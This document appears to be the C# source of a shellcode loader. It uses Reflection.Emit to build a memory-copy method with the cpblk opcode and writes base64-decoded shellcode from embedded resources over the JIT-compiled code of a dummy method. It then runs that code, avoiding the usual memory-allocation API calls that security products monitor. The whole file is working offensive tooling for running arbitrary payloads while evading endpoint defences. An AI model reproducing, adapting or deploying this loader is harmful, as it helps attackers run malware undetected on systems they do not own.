public static void InstantiateSecurityAttributes()
{
var t = new SecurityTreatAsSafeAttribute();
var u = new SecuritySafeCriticalAttribute();
var v = new SecurityTransparentAttribute();
var w = new SecurityCriticalAttribute();
var x = new SuppressUnmanagedCodeSecurityAttribute();
var y = new UnverifiableCodeAttribute();
var z = new AllowPartiallyTrustedCallersAttribute();
}
public static void Main(string[] args)
{
Type SmasherType = null;
SmasherType = Assembly.GetExecutingAssembly().GetType("MethodSmasher");
if (SmasherType == null)
{
AppDomain currDomain = AppDomain.CurrentDomain;
AssemblyName assName = new AssemblyName("MethodSmasher");
AssemblyBuilder assBuilder = currDomain.DefineDynamicAssembly(assName, AssemblyBuilderAccess.Run);
AllowPartiallyTrustedCallersAttribute att = new AllowPartiallyTrustedCallersAttribute();
ConstructorInfo attConstructor = att.GetType().GetConstructors()[0];
CustomAttributeBuilder attBuilder = new CustomAttributeBuilder(attConstructor, new object[] { });
assBuilder.SetCustomAttribute(attBuilder);
ModuleBuilder modBuilder = assBuilder.DefineDynamicModule("MethodSmasher");
UnverifiableCodeAttribute codAtt = new UnverifiableCodeAttribute();
ConstructorInfo codAttConstructor = codAtt.GetType().GetConstructors()[0];
CustomAttributeBuilder modAttBuilder = new CustomAttributeBuilder(codAttConstructor, new object[] { });
modBuilder.SetCustomAttribute(modAttBuilder);
TypeBuilder tBuilder = modBuilder.DefineType("MethodSmasher", TypeAttributes.Public);
Type[] parameters = new Type[3] {
typeof(IntPtr), typeof(IntPtr), typeof(Int32)
};
MethodBuilder methBuilder = tBuilder.DefineMethod("OverwriteMethod", (MethodAttributes.Static | MethodAttributes.Public), null, parameters);
ILGenerator generator = methBuilder.GetILGenerator();
generator.Emit(OpCodes.Ldarg_0);
generator.Emit(OpCodes.Ldarg_1);
generator.Emit(OpCodes.Ldarg_2);
generator.Emit(OpCodes.Volatile);
generator.Emit(OpCodes.Cpblk);
generator.Emit(OpCodes.Ret);
SmasherType = tBuilder.CreateType();
}
MethodInfo OverwriteMethod = SmasherType.GetMethod("OverwriteMethod");
Type SmashMeType = null;
SmashMeType = Assembly.GetExecutingAssembly().GetType("SmashMe");
if (SmashMeType == null)
{
AppDomain currDomain = AppDomain.CurrentDomain;
AssemblyName assName = new AssemblyName("SmashMe");
AssemblyBuilder assBuilder = currDomain.DefineDynamicAssembly(assName, AssemblyBuilderAccess.Run);
AllowPartiallyTrustedCallersAttribute att = new AllowPartiallyTrustedCallersAttribute();
ConstructorInfo attConstructor = att.GetType().GetConstructors()[0];
CustomAttributeBuilder attBuilder = new CustomAttributeBuilder(attConstructor, new object[] { });
assBuilder.SetCustomAttribute(attBuilder);
ModuleBuilder modBuilder = assBuilder.DefineDynamicModule("SmashMe");
UnverifiableCodeAttribute codAtt = new UnverifiableCodeAttribute();
ConstructorInfo codAttConstructor = codAtt.GetType().GetConstructors()[0];
CustomAttributeBuilder modAttBuilder = new CustomAttributeBuilder(codAttConstructor, new object[] { });
modBuilder.SetCustomAttribute(modAttBuilder);
TypeBuilder tBuilder = modBuilder.DefineType("SmashMe", TypeAttributes.Public);
Type[] parameters = new Type[1] {
typeof(Int32)
};
MethodBuilder mBuilder = tBuilder.DefineMethod("OverwriteMe", (MethodAttributes.Public | MethodAttributes.Static), typeof(Int32), parameters);
ILGenerator generator = mBuilder.GetILGenerator();
Int32 xorValue = 0x41424344;
generator.DeclareLocal(typeof(Int32));
generator.Emit(OpCodes.Ldarg_0);
for (int i = 0; i < 100; i++)
{
generator.Emit(OpCodes.Ldc_I4, xorValue);
generator.Emit(OpCodes.Xor);
generator.Emit(OpCodes.Stloc_0);
generator.Emit(OpCodes.Ldloc_0);
xorValue++;
}
generator.Emit(OpCodes.Ldc_I4, xorValue);
generator.Emit(OpCodes.Xor);
generator.Emit(OpCodes.Ret);
SmashMeType = tBuilder.CreateType();
}
MethodInfo TargetMethod = SmashMeType.GetMethod("OverwriteMe");
//Force target method to be JIT'd
for (int i = 0; i < 20; i++)
{
TargetMethod.Invoke(null, new object[] { 0x11112222 });
}
IntPtr scAddress = IntPtr.Zero;
if (IntPtr.Size == 4)
{
//Your shellcode should be base64 encoded
var currentAssembly = Assembly.GetExecutingAssembly();
var resourceStream = currentAssembly.GetManifestResourceStream(@"NoAPISCLoader.scx86.txt");
StreamReader sr = new StreamReader(resourceStream);
string encSC = sr.ReadToEnd();
byte[] buf = Convert.FromBase64String(encSC);
byte[] shellcodeStub = new byte[10] {
0x60, 0xE8, 0x04, 0x00, 0x00, 0x00, 0x61, 0x31, 0xC0, 0xC3
};
byte[] finalShellcode = new byte[buf.Length + shellcodeStub.Length];
Buffer.BlockCopy(shellcodeStub, 0, finalShellcode, 0, shellcodeStub.Length);
Buffer.BlockCopy(buf, 0, finalShellcode, shellcodeStub.Length, buf.Length);
scAddress = Marshal.AllocHGlobal(finalShellcode.Length);
Marshal.Copy(finalShellcode, 0, scAddress, finalShellcode.Length);
var TargetMethodAddress = GetMethodAddress(TargetMethod);
object[] methargs = new object[3] {
TargetMethodAddress, scAddress, finalShellcode.Length
};
OverwriteMethod.Invoke(null, methargs);
object[] methargs2 = new object[1] {
0x11112222
};
var retval = TargetMethod.Invoke(null, methargs2);
if ((Int32)retval != 0)
{
System.Environment.Exit(0);
}
}
else
{
//Your shellcode should be base64 encoded
var currentAssembly = Assembly.GetExecutingAssembly();
var resourceStream = currentAssembly.GetManifestResourceStream(@"NoAPISCLoader.scx64.txt");
StreamReader sr = new StreamReader(resourceStream);
string encSC = sr.ReadToEnd();
byte[] buf = Convert.FromBase64String(encSC);
byte[] shellcodeStub = new byte[27] {
0x41, 0x54, 0x41, 0x55, 0x41, 0x56, 0x41, 0x57, 0x55, 0xE8, 0x0D, 0x00, 0x00, 0x00, 0x5D, 0x41, 0x5F, 0x41, 0x5E, 0x41, 0x5D, 0x41, 0x5C, 0x48, 0x31, 0xC0, 0xC3
};
byte[] finalShellcode = new byte[buf.Length + shellcodeStub.Length];
Buffer.BlockCopy(shellcodeStub, 0, finalShellcode, 0, shellcodeStub.Length);
Buffer.BlockCopy(buf, 0, finalShellcode, shellcodeStub.Length, buf.Length);
scAddress = Marshal.AllocHGlobal(finalShellcode.Length);
Marshal.Copy(finalShellcode, 0, scAddress, finalShellcode.Length);
var TargetMethodAddress = GetMethodAddress(TargetMethod);
object[] methargs = new object[3] {
TargetMethodAddress, scAddress, finalShellcode.Length
};
OverwriteMethod.Invoke(null, methargs);
object[] methargs2 = new object[1] {
0x11112222
};
var retval = TargetMethod.Invoke(null, methargs2);
if ((Int32)retval != 0)
{
System.Environment.Exit(0);
}
}
}
public static void Inject(byte[] shellcode)
{
//begin memcopy en msil
AppDomain appD = AppDomain.CurrentDomain;
AssemblyName assName = new AssemblyName("MethodSmasher");
AssemblyBuilder assBuilder = appD.DefineDynamicAssembly(assName, AssemblyBuilderAccess.Run);
AllowPartiallyTrustedCallersAttribute attr = new AllowPartiallyTrustedCallersAttribute();
ConstructorInfo csInfo = attr.GetType().GetConstructors()[0];
object[] obArray = new object[0];
CustomAttributeBuilder cAttrB = new CustomAttributeBuilder(csInfo, obArray);
assBuilder.SetCustomAttribute(cAttrB);
ModuleBuilder mBuilder = assBuilder.DefineDynamicModule("MethodSmasher");
UnverifiableCodeAttribute codAttr = new UnverifiableCodeAttribute();
csInfo = codAttr.GetType().GetConstructors()[0];
CustomAttributeBuilder modCAttrB = new CustomAttributeBuilder(csInfo, obArray);
mBuilder.SetCustomAttribute(modCAttrB);
TypeBuilder tBuilder = mBuilder.DefineType("MethodSmasher", TypeAttributes.Public);
Type[] allParams = { typeof(IntPtr), typeof(IntPtr), typeof(Int32) };
MethodBuilder methodBuilder = tBuilder.DefineMethod("OverwriteMethod", MethodAttributes.Public | MethodAttributes.Static, null, allParams);
ILGenerator generator = methodBuilder.GetILGenerator();
generator.Emit(OpCodes.Ldarg_0);
generator.Emit(OpCodes.Ldarg_1);
generator.Emit(OpCodes.Ldarg_2);
generator.Emit(OpCodes.Volatile);
generator.Emit(OpCodes.Cpblk);
generator.Emit(OpCodes.Ret);
var smasherType = tBuilder.CreateType();
var overWriteMethod = smasherType.GetMethod("OverwriteMethod");
//end memcopy en msil
//begin xor dummy method
appD = AppDomain.CurrentDomain;
assName = new AssemblyName("SmashMe");
assBuilder = appD.DefineDynamicAssembly(assName, AssemblyBuilderAccess.Run);
attr = new AllowPartiallyTrustedCallersAttribute();
csInfo = attr.GetType().GetConstructors()[0];
obArray = new object[0];
cAttrB = new CustomAttributeBuilder(csInfo, obArray);
assBuilder.SetCustomAttribute(cAttrB);
mBuilder = assBuilder.DefineDynamicModule("SmashMe");
codAttr = new UnverifiableCodeAttribute();
csInfo = codAttr.GetType().GetConstructors()[0];
modCAttrB = new CustomAttributeBuilder(csInfo, obArray);
mBuilder.SetCustomAttribute(modCAttrB);
tBuilder = mBuilder.DefineType("SmashMe", TypeAttributes.Public);
Int32 xorK = 0x41424344;
Type[] allParams2 = { typeof(Int32) };
methodBuilder = tBuilder.DefineMethod("OverwriteMe", MethodAttributes.Public | MethodAttributes.Static, typeof(Int32), allParams2);
generator = methodBuilder.GetILGenerator();
generator.DeclareLocal(typeof(Int32));
generator.Emit(OpCodes.Ldarg_0);
for (var x = 0; x < 101; x++)
{
generator.Emit(OpCodes.Ldc_I4, xorK);
generator.Emit(OpCodes.Xor);
generator.Emit(OpCodes.Stloc_0);
generator.Emit(OpCodes.Ldloc_0);
}
generator.Emit(OpCodes.Ldc_I4, xorK);
generator.Emit(OpCodes.Xor);
generator.Emit(OpCodes.Ret);
var smashmeType = tBuilder.CreateType();
var overwriteMeMethod = smashmeType.GetMethod("OverwriteMe");
//end xor dummy method
//jit the xor method
for (var x = 0; x < 21; x++)
{
try
{
var i = overwriteMeMethod.Invoke(null, new object[] { 0x11112222 });
Console.WriteLine(i); //debug
}
catch (Exception e)
{
if (e.InnerException != null)
{
string err = e.InnerException.Message;
}
}
}
byte[] trap;
if (IntPtr.Size == 4)
{
//32bits shcode
trap = new byte[] { 0x60, 0xe8, 0x04, 0, 0, 0, 0x61, 0x31, 0xc0, 0xc3 };
}
else
{
//64bits shcode
trap = new byte[] { 0x41, 0x54, 0x41, 0x55, 0x41, 0x56, 0x41, 0x57, 0x55, 0xE8, 0x0D, 0x00, 0x00, 0x00, 0x5D, 0x41, 0x5F, 0x41, 0x5E, 0x41, 0x5D, 0x41, 0x5C, 0x48, 0x31, 0xC0, 0xC3 };
}
byte[] finalShellcode = new byte[trap.Length + shellcode.Length];
Buffer.BlockCopy(trap, 0, finalShellcode, 0, trap.Length);
Buffer.BlockCopy(shellcode, 0, finalShellcode, trap.Length, shellcode.Length);
IntPtr shellcodeAddress = Marshal.AllocHGlobal(finalShellcode.Length);
Marshal.Copy(finalShellcode, 0, shellcodeAddress, finalShellcode.Length);
IntPtr targetMethodAddress = getMethodAddress(overwriteMeMethod);
object[] owParams = new object[] { targetMethodAddress, shellcodeAddress, finalShellcode.Length };
try
{
overWriteMethod.Invoke(null, owParams);
}
catch (Exception e)
{
if (e.InnerException != null)
{
string err = e.InnerException.Message;
}
}
overwriteMeMethod.Invoke(null, new object[] { 0x11112222 });
}
